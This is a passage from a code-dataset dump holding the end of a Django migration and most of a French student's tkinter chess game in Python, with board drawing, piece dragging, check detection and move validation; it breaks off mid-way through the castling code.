field=models.DateTimeField(auto_now=True),\n ),\n migrations.AddField(\n model_name='stock',\n name='created_at',\n field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='stock',\n name='updated_at',\n field=models.DateTimeField(auto_now=True),\n ),\n ]\n" } ]
15
NicoTirel/jeuEchecs
https://github.com/NicoTirel/jeuEchecs
25557693dd42656c969d268ea63d1d7e39fe5e33
9a76c2340bd729d69ec5c89e1f91748ca847ad21
c662e9addbbe6422a8078fe2e6d12233798749e7
refs/heads/master
2022-11-07T16:24:10.998698
2019-11-28T13:13:57
2019-11-28T13:13:57
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5231800079345703, "alphanum_fraction": 0.5529879331588745, "avg_line_length": 36.552486419677734, "blob_id": "44ecfd6bc69c0e6b7f35297bc97c61c2d339d2ec", "content_id": "af1776c8a5169df1036984b407137a7d5f3c97fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27924, "license_type": "no_license", "max_line_length": 423, "num_lines": 724, "path": "/programme.py", "repo_name": "NicoTirel/jeuEchecs", "src_encoding": "UTF-8", "text": "#Projet IA échec (pour coco <3)\r\n\r\nfrom tkinter import *\r\nfrom tkinter.messagebox import *\r\nfrom functools import partial\r\n\r\nroot = Tk()\r\n\r\nroot['bg']='#A4A4A4'\r\nroot.geometry(\"1000x600+10+10\")\r\nroot.title('Jeu d\\'échec')\r\n\r\nechiquier = Canvas(root, width=600, height=600, background='white')\r\nechiquier.pack(side='left')\r\n\r\nposX = 0\r\nposY = 0\r\n\r\njoueur = \"blanc\"\r\n\r\ncapture = False\r\n\r\n\r\n\"\"\"def jouerCoup(case, event):\r\n\tif echiquier.itemcget(CURRENT, 'fill')=='blue':\r\n\t\tx=event.x\r\n\t\ty=event.y\r\n\t\tX = (x-44)//64\r\n\t\tY = (y-44)//64\r\n\t\tpos = lirePosition()\r\n\t\tif coupAutorise(pieceSelect, posX, posY, X, Y) :\r\n\t\t\techiquier.coords(CURRENT, X*64+32+marge, Y*64+32+marge, X*64+32+marge, Y*64+32+marge)\r\n\t\t\techiquier.update()\r\n\t\t\t#pos = lirePosition()\r\n\t\t\t#print(pos==position)\r\n\t\t\t#marquerCoup(position, pos)\r\n\t\t\t#print(coups)\r\n\t\t\tposition = pos\r\n\t\t\tif joueur==\"blanc\":\r\n\t\t\t\tjoueur=\"noir\"\r\n\t\t\telse:\r\n\t\t\t\tjoueur=\"blanc\"\r\n\t\telse:\r\n\t\t\techiquier.coords(CURRENT, posX*64+32+marge, posY*64+32+marge, posX*64+32+marge, posY*64+32+marge)\r\n\t\t\techiquier.update()\"\"\"\r\n\r\ndef casesEchiquier(couleur, lat, longi): #lat : lettres et longi : chiffres\r\n\tglobal cases\r\n\tcases = []\r\n\tnbrecases = 0\r\n\tcases.append(echiquier.create_rectangle(lat, longi, lat+64, longi+64, fill=couleur, tags='cases'))\r\n\t#echiquier.tag_bind(cases[nbrecases], '<Button-1>', partial(jouerCoup, nbrecases))\r\n\tif couleur==\"lightgray\" and lat!=64*7+marge:\r\n\t\tcouleur=\"white\"\r\n\telif couleur==\"white\" and lat!=64*7+marge:\r\n\t\tcouleur=\"lightgray\"\r\n\tif lat==64*7+marge:\r\n\t\tlat=marge\r\n\t\tlongi+=64\r\n\telse:\r\n\t\tlat+=64\r\n\tif lat!=marge or longi!=512+marge:\r\n\t\tcasesEchiquier(couleur, lat, longi)\r\n\tnbrecases+=1\r\n\r\nmarge = 44\r\ncasesEchiquier(\"white\", marge, marge)\r\n\r\ntourN = PhotoImage(file=\"images/tourN.png\")\r\ncavalierN = PhotoImage(file=\"images/cavalierN.png\")\r\nfouN = PhotoImage(file=\"images/fouN.png\")\r\ndameN = PhotoImage(file=\"images/dameN.png\")\r\nroiN = PhotoImage(file=\"images/roiN.png\")\r\npionN = PhotoImage(file=\"images/pionN.png\")\r\ntourB = PhotoImage(file=\"images/tourB.png\")\r\ncavalierB = PhotoImage(file=\"images/cavalierB.png\")\r\nfouB = PhotoImage(file=\"images/fouB.png\")\r\ndameB = PhotoImage(file=\"images/dameB.png\")\r\nroiB = PhotoImage(file=\"images/roiB.png\")\r\npionB = PhotoImage(file=\"images/pionB.png\")\r\n\r\n\r\npartie = Canvas(root, width=380, height=600, background='white')\r\npartie.pack(side='right')\r\n\r\ndef placerPieces():\r\n\tglobal nbrepieces, pieces\r\n\tnbrepieces = 0\r\n\tpieces = []\r\n\tcentre = marge + 32\r\n\tfor ligne in range(0, 8):\r\n\t\tfor colonne in range(0, 8):\r\n\t\t\tif position[ligne][colonne] == \"tourN\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=tourN, tags=\"piecesN\"))\r\n\t\t\telif position[ligne][colonne] == \"cavalierN\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=cavalierN, tags=\"piecesN\"))\r\n\t\t\telif position[ligne][colonne] == \"fouN\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=fouN, tags=\"piecesN\"))\r\n\t\t\telif position[ligne][colonne] == \"dameN\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=dameN, tags=\"piecesN\"))\r\n\t\t\telif position[ligne][colonne] == \"roiN\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=roiN, tags=\"piecesN\"))\r\n\t\t\telif position[ligne][colonne] == \"pionN\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=pionN, tags=\"piecesN\"))\r\n\t\t\telif position[ligne][colonne] == \"tourB\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=tourB, tags=\"piecesB\"))\r\n\t\t\telif position[ligne][colonne] == \"cavalierB\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=cavalierB, tags=\"piecesB\"))\r\n\t\t\telif position[ligne][colonne] == \"fouB\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=fouB, tags=\"piecesB\"))\r\n\t\t\telif position[ligne][colonne] == \"dameB\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=dameB, tags=\"piecesB\"))\r\n\t\t\telif position[ligne][colonne] == \"roiB\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=roiB, tags=\"piecesB\"))\r\n\t\t\telif position[ligne][colonne] == \"pionB\":\r\n\t\t\t\tpieces.append(echiquier.create_image(centre+colonne*64, centre+ligne*64, image=pionB, tags=\"piecesB\"))\r\n\t\t\tif position[ligne][colonne] != \"R\":\r\n\t\t\t\techiquier.tag_bind(pieces[nbrepieces], '<Button-1>', partial(positionDepart, nbrepieces))\r\n\t\t\t\techiquier.tag_bind(pieces[nbrepieces], '<B1-Motion>', partial(deplacerPieces, nbrepieces))\r\n\t\t\t\techiquier.tag_bind(pieces[nbrepieces], '<B1-ButtonRelease>', partial(relacherPieces, nbrepieces))\r\n\t\t\t\tnbrepieces+=1\r\n\r\n\"\"\"def lirePosition():\r\n\tglobal position, coups\r\n\tfor ligne in range(0,8):\r\n\t\tfor colonne in range(0,8):\r\n\t\t\ttag = echiquier.find_closest(colonne*64+32+marge, ligne*64+32+marge)[0]\r\n\t\t\tif tag<=64:\r\n\t\t\t\tposition[ligne][colonne] = \"R\"\r\n\t\t\telse:\r\n\t\t\t\tif (tag==65 or tag==72) and position[ligne][colonne] != \"tourN\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"tourN\"\r\n\t\t\t\t\tcoups.append((\"T\", False, colonne, ligne))\r\n\t\t\t\telif (tag==66 or tag==71) and position[ligne][colonne] != \"cavalierN\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"cavalierN\"\r\n\t\t\t\t\tcoups.append((\"C\", False, colonne, ligne))\r\n\t\t\t\telif (tag==67 or tag==70) and position[ligne][colonne] != \"fouN\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"fouN\"\r\n\t\t\t\t\tcoups.append((\"F\", False, colonne, ligne))\r\n\t\t\t\telif tag==68 and position[ligne][colonne] != \"dameN\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"dameN\"\r\n\t\t\t\t\tcoups.append((\"D\", False, colonne, ligne))\r\n\t\t\t\telif tag==69 and position[ligne][colonne] != \"roiN\": \r\n\t\t\t\t\tposition[ligne][colonne] = \"roiN\"\r\n\t\t\t\t\tcoups.append((\"R\", False, colonne, ligne))\r\n\t\t\t\telif (tag>=73 and tag<=80) and position[ligne][colonne] != \"pionN\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"pionN\"\r\n\t\t\t\t\tcoups.append((\"P\", False, colonne, ligne))\r\n\t\t\t\telif (tag==89 or tag==96) and position[ligne][colonne] != \"tourB\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"tourB\"\r\n\t\t\t\t\tcoups.append((\"T\", False, colonne, ligne))\r\n\t\t\t\telif (tag==90 or tag==95) and position[ligne][colonne] != \"cavalierB\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"cavalierB\"\r\n\t\t\t\t\tcoups.append((\"C\", False, colonne, ligne))\r\n\t\t\t\telif (tag==91 or tag==94) and position[ligne][colonne] != \"fouB\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"fouB\"\r\n\t\t\t\t\tcoups.append((\"F\", False, colonne, ligne))\r\n\t\t\t\telif tag==92 and position[ligne][colonne] != \"dameB\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"dameB\"\r\n\t\t\t\t\tcoups.append((\"D\", False, colonne, ligne))\r\n\t\t\t\telif tag==93 and position[ligne][colonne] != \"roiB\": \r\n\t\t\t\t\tposition[ligne][colonne] = \"roiB\"\r\n\t\t\t\t\tcoups.append((\"R\", False, colonne, ligne))\r\n\t\t\t\telif (tag>=81 and tag<=88) and position[ligne][colonne] != \"pionB\":\r\n\t\t\t\t\tposition[ligne][colonne] = \"pionB\"\r\n\t\t\t\t\tcoups.append((\"P\", False, colonne, ligne))\"\"\"\r\n\r\ndef positionDepart(piece, event):\r\n\tglobal posX, posY, pieceSelect\r\n\tposX = (event.x-44)//64\r\n\tposY = (event.y-44)//64\r\n\t\"\"\"for x in range(0,8):\r\n\t\tfor y in range(0,8):\r\n\t\t\tif coupAutorise(piece, posX, posY, x, y):\r\n\t\t\t\tprint(\"testA\",x, y)\r\n\t\t\t\tcase = echiquier.find_withtag(\"cases\")[y*8+x]\r\n\t\t\t\techiquier.itemconfig(case, fill=\"blue\")\r\n\t\t\t\tpieceSelect = piece\"\"\"\r\n\r\n\r\ndef deplacerPieces(piece, event):\r\n x=event.x\r\n y=event.y\r\n echiquier.coords(CURRENT,x,y)\r\n echiquier.update()\r\n\r\ndef relacherPieces(piece, event):\r\n\tglobal joueur, position, nbreCoups, coups, capture\r\n\tx=event.x\r\n\ty=event.y\r\n\tX = (x-44)//64\r\n\tY = (y-44)//64\r\n\tif X<0 or X>7 or Y<0 or Y>7 or (X==posX and Y==posY):\t\t#pour que les pièces ne débordent pas de l'échiquier ou que le joueur ne reste pas sur place\r\n\t\techiquier.coords(CURRENT, posX*64+32+marge, posY*64+32+marge)\r\n\t\techiquier.update()\r\n\telse:\r\n\t\tposiTemp = position[Y][X]\r\n\t\tposition[Y][X] = position[posY][posX]\r\n\t\tposition[posY][posX] = \"R\"\r\n\t\tif coupLegal():\r\n\t\t\tposition[posY][posX] = position[Y][X]\r\n\t\t\tposition[Y][X] = posiTemp\r\n\t\t\tif coupAutorise(piece, posX, posY, X, Y):\r\n\t\t\t\tposition[Y][X] = position[posY][posX]\r\n\t\t\t\tposition[posY][posX] = \"R\"\r\n\t\t\t\tcoups.append((position[Y][X][0], capture, posX, posY, X, Y))\r\n\t\t\t\tcapture = False\r\n\t\t\t\techiquier.coords(CURRENT, X*64+32+marge, Y*64+32+marge)\r\n\t\t\t\techiquier.update()\r\n\t\t\t\tif joueur==\"blanc\":\r\n\t\t\t\t\tjoueur=\"noir\"\r\n\t\t\t\telse:\r\n\t\t\t\t\tjoueur=\"blanc\"\r\n\t\t\t\tif not(coupLegal()):\r\n\t\t\t\t\tshowwarning('Alerte!', 'Echec! :)')\r\n\t\t\telse:\r\n\t\t\t\techiquier.coords(CURRENT, posX*64+32+marge, posY*64+32+marge)\r\n\t\t\t\techiquier.update()\r\n\t\telse:\r\n\t\t\tposition[posY][posX] = position[Y][X]\r\n\t\t\tposition[Y][X] = posiTemp\r\n\t\t\techiquier.coords(CURRENT, posX*64+32+marge, posY*64+32+marge)\r\n\t\t\techiquier.update()\r\n\r\ndef capturePiece(X, Y):\r\n\tglobal capture\r\n\tpiece = echiquier.find_enclosed(X*64+32+marge-32, Y*64+32+marge-32, X*64+32+marge+32, Y*64+32+marge+32)[0] #detecte la piece aux coords X, Y\r\n\techiquier.delete(piece)\r\n\tcapture = True\r\n\tprint(\"done!\")\r\n\r\ndef coupLegal():\r\n\tx = 0\r\n\ty = 0\r\n\tdanger = False\r\n\tif joueur==\"blanc\":\r\n\t\t####Première étape, trouver le roi####\r\n\t\twhile y<=7 and position[y][x] != \"roiB\":\r\n\t\t\tx += 1\r\n\t\t\tif x==8:\r\n\t\t\t\tx=0\r\n\t\t\t\ty+=1\r\n\t\tif y==8:\r\n\t\t\tprint(position)\r\n\t\t\tprint(\"Erreur\")\r\n\t\t\treturn True\r\n\r\n\t\t####Scanne la ligne####\r\n\t\tif x!=0:\r\n\t\t\tfor i in range(0, x):\r\n\t\t\t\tif position[y][i] == \"tourN\" or position[y][i] == \"dameN\" or (position[y][i] == \"roiN\" and i==x-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[y][i] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif x != 7:\r\n\t\t\tx1=x+1\r\n\t\t\twhile x1<=7 and position[y][x1] == \"R\":\r\n\t\t\t\tx1+=1\r\n\t\t\tif x1!=8 and (position[y][x1] == \"dameN\" or position[y][x1] == \"tourN\" or (position[y][x1] == \"roiN\" and x1==x+1)):\r\n\t\t\t\treturn False\r\n\r\n\t\t####Scanne la colonne####\r\n\t\tif y!=0:\r\n\t\t\tfor i in range(0, y):\r\n\t\t\t\tif position[i][x] == \"tourN\" or position[i][x] == \"dameN\" or (position[i][x] == \"roiN\" and i==y-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[i][x] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif y != 7:\r\n\t\t\ty1 = y+1\r\n\t\t\twhile y1<=7 and position[y1][x] == \"R\":\r\n\t\t\t\ty1+=1\r\n\t\t\tif y1!=8 and (position[y1][x] == \"dameN\" or position[y1][x] == \"tourN\" or (position[y1][x] == \"roiN\" and y1==y+1)):\r\n\t\t\t\treturn False\r\n\r\n\t\t####Scanne la diagonale####\r\n\t\tif x!=0 and y!=0:\r\n\t\t\tif x>y:\r\n\t\t\t\tdebut = x-y\r\n\t\t\telse:\r\n\t\t\t\tdebut = 0\r\n\t\t\tfor i in range(debut, x):\r\n\t\t\t\tif position[y-x+i][i] == \"fouN\" or position[y-x+i][i] == \"dameN\" or (position[y-x+i][i] == \"roiN\" and i==x-1) or (position[y-x+i][i] == \"pionN\" and i==x-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[y-x+i][i] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif x!=7 and y!=7:\r\n\t\t\tx1 = x+1\r\n\t\t\twhile y-x+x1<=7 and x1<=7 and position[y-x+x1][x1] == \"R\":\r\n\t\t\t\tx1+=1\r\n\t\t\tif y-x+x1!=8 and x1!=8 and (position[y-x+x1][x1] == \"fouN\" or position[y-x+x1][x1] == \"dameN\" or (position[y-x+x1][x1] == \"roiN\" and x1==x+1)):\r\n\t\t\t\treturn False\r\n\r\n\t\t####Scanne l'autre diagonale####\r\n\t\tif x!=0 and y!=7:\r\n\t\t\tif y+x>7:\r\n\t\t\t\tdebut = y+x-7\r\n\t\t\telse:\r\n\t\t\t\tdebut = 0\r\n\t\t\tfor i in range(debut, x):\r\n\t\t\t\tif position[y+x-i][i] == \"fouN\" or position[y+x-i][i] == \"dameN\" or (position[y+x-i][i] == \"roiN\" and i==x-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[y+x-i][i] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif x!=7 and y!=0:\r\n\t\t\tx1 = x+1\r\n\t\t\twhile y+x-x1>=0 and x1<=7 and position[y+x-x1][x1] == \"R\":\r\n\t\t\t\tx1+=1\r\n\t\t\tif y+x-x1!=-1 and x1!=8 and (position[y+x-x1][x1] == \"fouN\" or position[y+x-x1][x1] == \"dameN\" or (position[y+x-x1][x1] == \"roiN\" and x1==x+1) or (position[y+x-x1][x1] == \"pionN\" and x1==x+1)):\r\n\t\t\t\treturn False\r\n\t\t####Scanne le cavalier#####\r\n\t\tif y>=2 and x<=6 and position[y-2][x+1] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y>=1 and x<=5 and position[y-1][x+2] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y<=6 and x<=5 and position[y+1][x+2] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y<=5 and x<=6 and position[y+2][x+1] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y<=5 and x>=1 and position[y+2][x-1] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y<=6 and x>=2 and position[y+1][x-2] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y>=1 and x>=2 and position[y-1][x-2] == \"cavalierN\":\r\n\t\t\treturn False\r\n\t\telif y>=2 and x>=1 and position[y-2][x-1] == \"cavalierN\":\r\n\t\t\treturn False\r\n\r\n\r\n\telif joueur==\"noir\":\r\n\t\t####Première étape, trouver le roi####\r\n\t\twhile y<=7 and position[y][x] != \"roiN\":\r\n\t\t\tx += 1\r\n\t\t\tif x==8:\r\n\t\t\t\tx=0\r\n\t\t\t\ty+=1\r\n\t\tif y==8:\r\n\t\t\tprint(position)\r\n\t\t\tprint(\"Erreur\")\r\n\t\t\treturn True\r\n\r\n\t\t####Scanne la ligne####\r\n\t\tif x!=0:\r\n\t\t\tfor i in range(0, x):\r\n\t\t\t\tif position[y][i] == \"tourB\" or position[y][i] == \"dameB\" or (position[y][i] == \"roiB\" and i==x-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[y][i] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif x != 7:\r\n\t\t\tx1=x+1\r\n\t\t\twhile x1<=7 and position[y][x1] == \"R\":\r\n\t\t\t\tx1+=1\r\n\t\t\tif x1!=8 and (position[y][x1] == \"dameB\" or position[y][x1] == \"tourB\" or (position[y][x1] == \"roiB\" and x1==x+1)):\r\n\t\t\t\treturn False\r\n\r\n\t\t####Scanne la colonne####\r\n\t\tif y!=0:\r\n\t\t\tfor i in range(0, y):\r\n\t\t\t\tif position[i][x] == \"tourB\" or position[i][x] == \"dameB\" or (position[i][x] == \"roiB\" and i==y-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[i][x] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif y != 7:\r\n\t\t\ty1 = y+1\r\n\t\t\twhile y1<=7 and position[y1][x] == \"R\":\r\n\t\t\t\ty1+=1\r\n\t\t\tif y1!=8 and (position[y1][x] == \"dameB\" or position[y1][x] == \"tourB\" or (position[y1][x] == \"roiB\" and y1==y+1)):\r\n\t\t\t\treturn False\r\n\r\n\t\t####Scanne la diagonale####\r\n\t\tif x!=0 and y!=0:\r\n\t\t\tif x>y:\r\n\t\t\t\tdebut = x-y\r\n\t\t\telse:\r\n\t\t\t\tdebut = 0\r\n\t\t\tfor i in range(debut, x):\r\n\t\t\t\tif position[y-x+i][i] == \"fouB\" or position[y-x+i][i] == \"dameB\" or (position[y-x+i][i] == \"roiB\" and i==x-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[y-x+i][i] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif x!=7 and y!=7:\r\n\t\t\tx1 = x+1\r\n\t\t\twhile y-x+x1<=7 and x1<=7 and position[y-x+x1][x1] == \"R\":\r\n\t\t\t\tx1+=1\r\n\t\t\tif y-x+x1!=8 and x1!=8 and (position[y-x+x1][x1] == \"fouB\" or position[y-x+x1][x1] == \"dameB\" or (position[y-x+x1][x1] == \"roiB\" and x1==x+1) or (position[y-x+x1][x1] == \"pionB\" and x1==x+1)):\r\n\t\t\t\treturn False\r\n\r\n\t\t####Scanne l'autre diagonale####\r\n\t\tif x!=0 and y!=7:\r\n\t\t\tif y+x>7:\r\n\t\t\t\tdebut = y+x-7\r\n\t\t\telse:\r\n\t\t\t\tdebut = 0\r\n\t\t\tfor i in range(debut, x):\r\n\t\t\t\tif position[y+x-i][i] == \"fouB\" or position[y+x-i][i] == \"dameB\" or (position[y+x-i][i] == \"roiB\" and i==x-1) or (position[y+x-i][i] == \"pionB\" and i==x-1):\r\n\t\t\t\t\tdanger = True\r\n\t\t\t\telif position[y+x-i][i] != \"R\":\r\n\t\t\t\t\tdanger = False\r\n\t\tif danger:\r\n\t\t\treturn not(danger)\r\n\t\tif x!=7 and y!=0:\r\n\t\t\tx1 = x+1\r\n\t\t\twhile y+x-x1>=0 and x1<=7 and position[y+x-x1][x1] == \"R\":\r\n\t\t\t\tx1+=1\r\n\t\t\tif y+x-x1!=-1 and x1!=8 and (position[y+x-x1][x1] == \"fouB\" or position[y+x-x1][x1] == \"dameB\" or (position[y+x-x1][x1] == \"roiB\" and x1==x+1)):\r\n\t\t\t\treturn False\r\n\t\t####Scanne le cavalier#####\r\n\t\tif y>=2 and x<=6 and position[y-2][x+1] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y>=1 and x<=5 and position[y-1][x+2] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y<=6 and x<=5 and position[y+1][x+2] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y<=5 and x<=6 and position[y+2][x+1] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y<=5 and x>=1 and position[y+2][x-1] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y<=6 and x>=2 and position[y+1][x-2] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y>=1 and x>=2 and position[y-1][x-2] == \"cavalierB\":\r\n\t\t\treturn False\r\n\t\telif y>=2 and x>=1 and position[y-2][x-1] == \"cavalierB\":\r\n\t\t\treturn False\r\n\r\n\r\n\treturn True\r\n\r\n\r\n\r\ndef coupAutorise(piece, posX, posY, X, Y):\r\n#----------------------------------------------------Trait aux blancs----------------------------------------------------#\r\n#\r\n#\r\n\tif piece>15 and piece<=31:\r\n\t\tif joueur == \"noir\":\r\n\t\t\t#showwarning(\"Alerte\", \"C'est aux noirs de jouer\") #showwarning/showerror à voir ###Showwarning fait buguer echiquier.coords ???\r\n\t\t\treturn False\r\n\t\telse:\r\n\r\n###################################################TOUR BLANCHE#########################################################\r\n\r\n\t\t\tif piece==24 or piece==31:\r\n\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\treturn False\r\n\t\t\t\tif position[Y][X] == \"R\":\r\n\t\t\t\t\treturn X==posX or Y==posY\r\n\t\t\t\telif position[Y][X][-1] == \"N\" and (X==posX or Y==posY):\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn False\r\n\r\n###################################################CAVALIER BLANC#######################################################\r\n\r\n\t\t\telif piece==25 or piece==30:\r\n\t\t\t\tif position[Y][X] == \"R\":\r\n\t\t\t\t\treturn (abs(posX-X)==2 and abs(posY-Y)==1) or (abs(posX-X)==1 and abs(posY-Y)==2)\r\n\t\t\t\telif position[Y][X][-1] == \"N\":\r\n\t\t\t\t\tif (abs(posX-X)==2 and abs(posY-Y)==1) or (abs(posX-X)==1 and abs(posY-Y)==2):\r\n\t\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\t\treturn True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn False\r\n\r\n###################################################FOU BLANC############################################################\r\n\r\n\t\t\telif piece==26 or piece==29:\r\n\t\t\t\tif (X>posX and Y>posY) or (X<posX and Y<posY):\r\n\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t#print(ligne, colonne, ligne-min(posY,Y), colonne-min(posX,X), position[ligne][colonne], \"\\n\")\r\n\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne-min(posY,Y)==colonne-min(posX,X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t#print(ligne, colonne, ligne+colonne, max(posY, Y)+min(posX, X), position[ligne][colonne], \"\\n\")\r\n\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne+colonne==max(posY, Y)+min(posX, X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\tif position[Y][X][-1] == \"N\" and abs(posX-X)==abs(posY-Y):\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\telse:\r\n\t\t\t\t\treturn position[Y][X] == \"R\" and abs(posX-X)==abs(posY-Y)\r\n\r\n###################################################DAME BLANCHE##########################################################\r\n\r\n\t\t\telif piece==27:\r\n\t\t\t\tif (X==posX or Y==posY):\r\n\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\telse:\r\n\t\t\t\t\tif (X>posX and Y>posY) or (X<posX and Y<posY):\r\n\t\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne-min(posY,Y)==colonne-min(posX,X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tfor ligne in range(min(posY, Y), max(posY, Y)+1):\r\n\t\t\t\t\t\t\tfor colonne in range(min(posX, X), max(posX, X)+1):\r\n\t\t\t\t\t\t\t\tif position[ligne][colonne] != \"R\" and (ligne+colonne==max(posY, Y)+min(posX, X)) and (ligne!=posY or colonne!=posX) and (ligne!=Y or colonne!=X):\r\n\t\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\tif position[Y][X][-1] == \"N\" and ((abs(posX-X)==abs(posY-Y)) or (X==posX or Y==posY)):\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\treturn position[Y][X] == \"R\" and (abs(posX-X)==abs(posY-Y)) or (X==posX or Y==posY)\r\n\r\n###################################################ROI BLANC############################################################\r\n\r\n\t\t\telif piece==28:\r\n\t\t\t\tif position[Y][X] != \"R\" and position[Y][X][-1] != \"N\":\r\n\t\t\t\t\treturn False\r\n\t\t\t\telif abs(posX-X)<=1 and abs(posY-Y)<=1 and position[Y][X][-1] == \"N\":\r\n\t\t\t\t\tcapturePiece(X, Y)\r\n\t\t\t\t\treturn True\r\n\t\t\t\tif Y==7 and X==2 and position[Y][0]==\"tourB\" and position[Y][1]==\"R\" and position[Y][2]==\"R\" and position[Y][3]==\"R\" and position[Y][4] ==\"roiB\":\r\n\t\t\t\t\tposition[Y][3] = \"roiB\"\r\n\t\t\t\t\tposition[Y][4] = \"R\"\r\n\t\t\t\t\tif coupLegal():\r\n\t\t\t\t\t\tposition[Y][3] = \"R\"\r\n\t\t\t\t\t\tposition[Y][4] = \"roiB\"\r\n\t\t\t\t\t\tcoup = 0\r\n\t\t\t\t\t\tnbreCoups = len(coups)-2\r\n\t\t\t\t\t\tprint(nbreCoups)\r\n\t\t\t\t\t\twhile coup!=nbreCoups and (coups[coup][0]!=\"t\" or coups[coup][2]!=0 or coups[coup][3]!=Y) and 